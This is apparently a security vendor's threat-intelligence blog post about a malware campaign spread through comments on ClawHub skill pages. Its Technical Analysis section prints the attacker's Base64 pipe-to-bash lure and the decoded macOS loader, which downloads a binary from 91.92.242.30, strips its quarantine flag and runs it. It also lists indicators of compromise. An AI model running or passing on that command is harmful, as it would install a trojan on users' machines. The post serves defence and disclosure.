Back to blog

February 21, 2026

New Large-Scale OpenClaw Malware Campaign Spreading on ClawHub

OpenGuardrails Team · Security Research·8 min read·Security, Threat Intelligence, OpenClaw

Introducing Clawhub.Trojan.LiuComment

OpenGuardrails has identified a new, rapidly spreading malware campaign targeting the OpenClaw ecosystem through the ClawHub skill community.

We are naming this threat:

“Clawhub.Trojan.LiuComment”

This name reflects:

  • The propagation channel (ClawHub)
  • The malware type (Trojan)
  • The originating account (liuhui1010)
  • The infection vector (malicious post in comments)

The campaign is currently spreading at scale across the most popular OpenClaw skills.

Executive Overview

A user named @liuhui1010 posted the following message across multiple high-traffic OpenClaw skill pages on ClawHub:

Malicious comment containing Base64-encoded malware loader on ClawHub
The malicious comment disguised as a troubleshooting suggestion.

At first glance, this appears to be a troubleshooting suggestion.

It is not.

It is a malware loader.

Technical Analysis

OpenGuardrails decoded the Base64 payload. The comment instructed users to run in terminal: echo "Update-Service: https://..." && echo 'L2Jpbi9iYXNoIC1j...' | base64 -D | bash

Decoded command:

cd $TMPDIR && curl -O http://91.92.242.30/gbi7aev47pu0tf68 && xattr -c gbi7aev47pu0tf68 && chmod +x gbi7aev47pu0tf68 && ./gbi7aev47pu0tf68

What This Does

  • Moves into the macOS temporary directory
  • Downloads an executable from 91.92.242.30
  • Removes macOS quarantine attributes
  • Makes the file executable
  • Executes it immediately

Threat Intelligence

  • The IP 91.92.242.30 has previously been linked to the ClawHavoc malware distribution infrastructure.
  • The downloaded binary is flagged as malicious by 21 antivirus vendors on VirusTotal.
  • The payload is a macOS Trojan.
ClawHub malicious comment context

However, the attack successfully bypassed both:

  • VirusTotal automated inspection
  • OpenClaw's internal security review agent

Why It Bypassed Detection

The attacker combined:

  • Social engineering ("Update-Service" framing)
  • Base64 encoding
  • Comment-based distribution
  • User-triggered terminal execution

Security scanners typically inspect:

  • Direct URLs
  • Known signatures
  • Uploaded binaries

This payload was delivered as encoded text inside a comment, which significantly reduced detection likelihood.

A First-Principles Security Insight

This campaign validates a core cybersecurity principle:

“Security is a cost-based adversarial game.”

AI dramatically lowers the attacker's cost:

  • Code generation is instant
  • Obfuscation is automated
  • Comment spam is scalable
  • Social engineering is AI-optimized

Meanwhile, defenders must:

  • Continuously monitor
  • Invest in detection infrastructure
  • Adapt to new obfuscation methods
  • Sustain long-term operational cost

When attack cost approaches zero, the number of targets increases exponentially.

AI does not reduce the value of cybersecurity.

It amplifies it.

Impacted OpenClaw Skills on ClawHub

The campaign targeted the top-ranked OpenClaw skills:

List of targeted OpenClaw skills on ClawHub
High-traffic skills targeted by the campaign.

Trello

Trello skill page with malicious comment
Trello skill comment thread.

A user infection has already been reported in this skill's comment thread.

Report of user infection in Trello skill thread
Reported infection in the Trello skill thread.

Slack

Slack skill page with malicious comment
Slack skill comment thread.

Gog

Gog is Peter's own skill, the most downloaded skill on Clawhub, and it was also targeted by the attack.

Gog skill page with malicious comment
Gog skill comment thread.

MoltGuard

As the most popular security plugin on Clawhub, MoltGuard was also targeted by the attack.

MoltGuard skill page with malicious comment
MoltGuard skill comment thread.

Indicators of Compromise (IOCs)

  • Campaign: Clawhub.Trojan.LiuComment
  • IP: 91.92.242.30
  • Dropped File: gbi7aev47pu0tf68
  • Technique: Base64 obfuscated shell loader
  • Target: macOS users

Defensive Recommendations

We strongly recommend OpenClaw users install:

MoltGuard

An OpenClaw security plugin developed by OpenGuardrails.

MoltGuard provides:

  • Encoded payload detection
  • Command injection inspection
  • Runtime execution monitoring
  • Agent action validation
  • Sandboxed execution safeguards

OpenGuardrails focuses on securing AI agents and AI-native execution environments against real-world adversarial abuse.

The Bigger Picture

AI is reducing the marginal cost of launching attacks.

But defense remains:

  • Continuous
  • Capital-intensive
  • Operationally persistent

As AI accelerates adversarial innovation, the role of cybersecurity becomes not weaker—but more foundational.

OpenGuardrails will continue tracking Clawhub.Trojan.LiuComment and publishing updates as the situation evolves.

Stay vigilant.